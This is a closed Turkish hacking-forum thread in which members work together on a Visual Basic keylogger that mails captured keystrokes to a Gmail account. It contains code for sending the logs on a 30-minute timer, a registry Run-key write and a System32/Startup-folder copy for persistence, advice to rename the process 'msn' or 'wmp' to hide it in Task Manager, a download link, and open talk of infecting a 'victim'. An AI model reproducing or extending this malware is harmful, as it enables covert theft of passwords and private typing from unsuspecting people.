Mailli KeyLogger Yapımı // ÇALIŞIYOR.KODLAR ALINTI ANLATIM BENDEN.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Agemon

Özel Üye
22 Ocak 2010
6,476
1
bendede çalışıyor sorunsuz ama logları her 1 dk de yollaması kötü çümkü gmail hesabımız bloke olur o yüzden bunları 30 dk gelmesinin nasıl sağlayabiliriz bilen biri yardım edebilirmi acaba ?

bir dk 60 saniye olduğu için değer 60000 bunu yarım saat olarak hesapla..

efsane94

Yeni üye
23 May 2010
40
0
timer invertal değeri en fazla 60000 dir bu da 1 dk dir bundan fazla olmaz onu bende biliyorum 30 dk de gelmesini sağlamak içinlabelefln bağlamak gerekiyor bende onun nasıl bağlanacağı hakkında bilgini var mı diye soruyom

MrT-R4P

Üye
30 Ocak 2008
192
0
1 Dakikadan daha fazla interval nasıl yapılır bilmiyorum ben arkadaşlar.Zaten bende 1 dk kuLLanıyorum.

crazy3131

Katılımcı Üye
22 May 2010
525
0
Sevdim O Zalimi .)
PHP:
Private Sub Form_Load()
Label1.Caption = "0"
Label1.Visible = False
Timer3.Interval = 60000
End Sub

Private Sub Timer3_Timer()
If Label1.Caption = 1800 Then ' kaç dk istiyorsak 60 ile çarpıyoruz.30dk da bi gelsin diyorsanız 60X30=1800 ,oraya sonucu yazıyoruz.Ben 180 kullandım.
Else:
Label1.Caption = Label1.Caption + 1
End Sub

Kardeş bu kodları En başa General Bölümüne Yapıştırdım
Şu hatayı verdi :S

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Agemon

Özel Üye
22 Ocak 2010
6,476
1
kardeşim bu program çok etkili ve çalışan bir program bunu birlikte geliştirebilirsek süper olcağını düşünüyorum mesala dün gece düşündüm ve bunu pc her açıldığın da otomatik olarak başlasa ve görev yöneticisinde çıkmamasını sağlayabilirsek bence gerçekten o zaman mükemmel bir program olcağını düşünüyorum..konu hakkında araştırma yapıyorum bilgisi olanlarda paylaşsın

crazy3131

Katılımcı Üye
22 May 2010
525
0
Sevdim O Zalimi .)
kardeşim bu program çok etkili ve çalışan bir program bunu birlikte geliştirebilirsek süper olcağını düşünüyorum mesala dün gece düşündüm ve bunu pc her açıldığın da otomatik olarak başlasa ve görev yöneticisinde çıkmamasını sağlayabilirsek bence gerçekten o zaman mükemmel bir program olcağını düşünüyorum..konu hakkında araştırma yapıyorum bilgisi olanlarda paylaşsın

Kardeşim Bende Bunu Araştırıyordum Birkaç Şey buldum :D

MrT-R4P

Üye
30 Ocak 2008
192
0
PHP:
Private Sub Form_Load()
Label1.Caption = "0"
Label1.Visible = False
Timer3.Interval = 60000
End Sub

Private Sub Timer3_Timer()
If Label1.Caption = 1800 Then ' kaç dk istiyorsak 60 ile çarpıyoruz.30dk da bi gelsin diyorsanız 60X30=1800 ,oraya sonucu yazıyoruz.Ben 180 kullandım.
Else:
Label1.Caption = Label1.Caption + 1
End Sub

Kardeş bu kodları En başa General Bölümüne Yapıştırdım
Şu hatayı verdi :S

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Hatayı neden verdiği hakkında bilgim yok ama ,Denedim Çalışıyor..

17337467.jpg

Agemon

Özel Üye
22 Ocak 2010
6,476
1
bakın arkadaşlar şu kodları uygun şekilde doldurup kodlara eklerseniz pc her açıldığında çalışabilir ancak programın yeri değiştiğinde kod pasif olabilir..

PHP:
Dim reg As Object
        reg = CreateObject("wscript.shell")
        reg.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & ("Program ismi"), Application.StartupPath & "Programın bulunduğu yer" & ("programın ismi") & ".exe")
    End Sub

MrT-R4P

Üye
30 Ocak 2008
192
0
bakın arkadaşlar şu kodları uygun şekilde doldurup kodlara eklerseniz pc her açıldığında çalışabilir ancak programın yeri değiştiğinde kod pasif olabilir..

PHP:
Dim reg As Object
        reg = CreateObject("wscript.shell")
        reg.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & ("Program ismi"), Application.StartupPath & "Programın bulunduğu yer" & ("programın ismi") & ".exe")
    End Sub

Teşekkürler ama bu kadar uğraşmaya gerek yok.System32 nin içine bi kopya atıyoruz ve başlat/tümprogramlar/başlangıç klasörünün içine attığımız zaman oLuyor.Genede emeğine Teşekkür ettim ;)

Agemon

Özel Üye
22 Ocak 2010
6,476
1

Teşekkürler ama bu kadar uğraşmaya gerek yok.System32 nin içine bi kopya atıyoruz ve başlat/tümprogramlar/başlangıç klasörünün içine attığımız zaman oLuyor.Genede emeğine Teşekkür ettim ;)

Rica ederim kardeşim bir de görev yöneticisinde görünmesini istemiyoruz aklıma şöyle bir çözüm geldi mesala programı oluştururken "form1" yazan yeri yani programımızın adınıı hiç bir şekilde değiştirmiyoruz programı yaptıktan sonra programı yeniden adlandır diyerek "msn" "wmp" v.s isimler koyarak şüpheleri ortadan kaldırabiliriz böylece görec yöneticisinde programımız sahte isimle gözükceği için hiç bir sorun olmayacaktır..

MrT-R4P

Üye
30 Ocak 2008
192
0
Dostum Ben sadece Timer3 ve Label ekleyim.Keylogger kodlarını sen kendin ekLe oke.Evde değilim tekrar kodlamak istemiyorum.Pazartesi eve geçicem.Biraz bekle upload ediyim.

//Edit ßy MrT-R4P\\

Upload ettim Dostum Buyur.Timer 3 tane var keyloggerda ben timer3. yane mail yollama kodu olanı ekledim ve en son eklemen gereken labeli ekledim ve 30 dk için olan kodu ekledim.

LİNK: https://tik.lat/lJluw

Son düzenleme:

Agemon

Özel Üye
22 Ocak 2010
6,476
1
kardeşim bak benimde aklıma geldi programın pc her açıldığında çalışmasını istiyoruz ya mesala bunu kurbana yedirdik onda nasıl başarcaz unu :D

MrT-R4P

Üye
30 Ocak 2008
192
0
kardeşim bak benimde aklıma geldi programın pc her açıldığında çalışmasını istiyoruz ya mesala bunu kurbana yedirdik onda nasıl başarcaz unu :D
Bunu hiç düşünmemiştim.Haklısın.Ben bu kodlarla bi keylogger yaptım ama geliştirmedim hiç,zamanım olmadı evde değilim.Onu bir araştırıyım.Ben uzman coder değilim,Belki bize uzmanlar azıcık yardımcı olabilir diye düşünüyorum onlara kalmış birşey...:(:(

Agemon

Özel Üye
22 Ocak 2010
6,476
1
Bunu hiç düşünmemiştim.Haklısın.Ben bu kodlarla bi keylogger yaptım ama geliştirmedim hiç,zamanım olmadı evde değilim.Onu bir araştırıyım.Ben uzman coder değilim,Belki bize uzmanlar azıcık yardımcı olabilir diye düşünüyorum onlara kalmış birşey...:(:(

aynen kardeşim bak bunu Dr.Coder'a söyleyelim bir de o baksın belki yarıdmcı olabilir ben tanıdığım tüm programcılara söyledim haber bekliyorum..

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.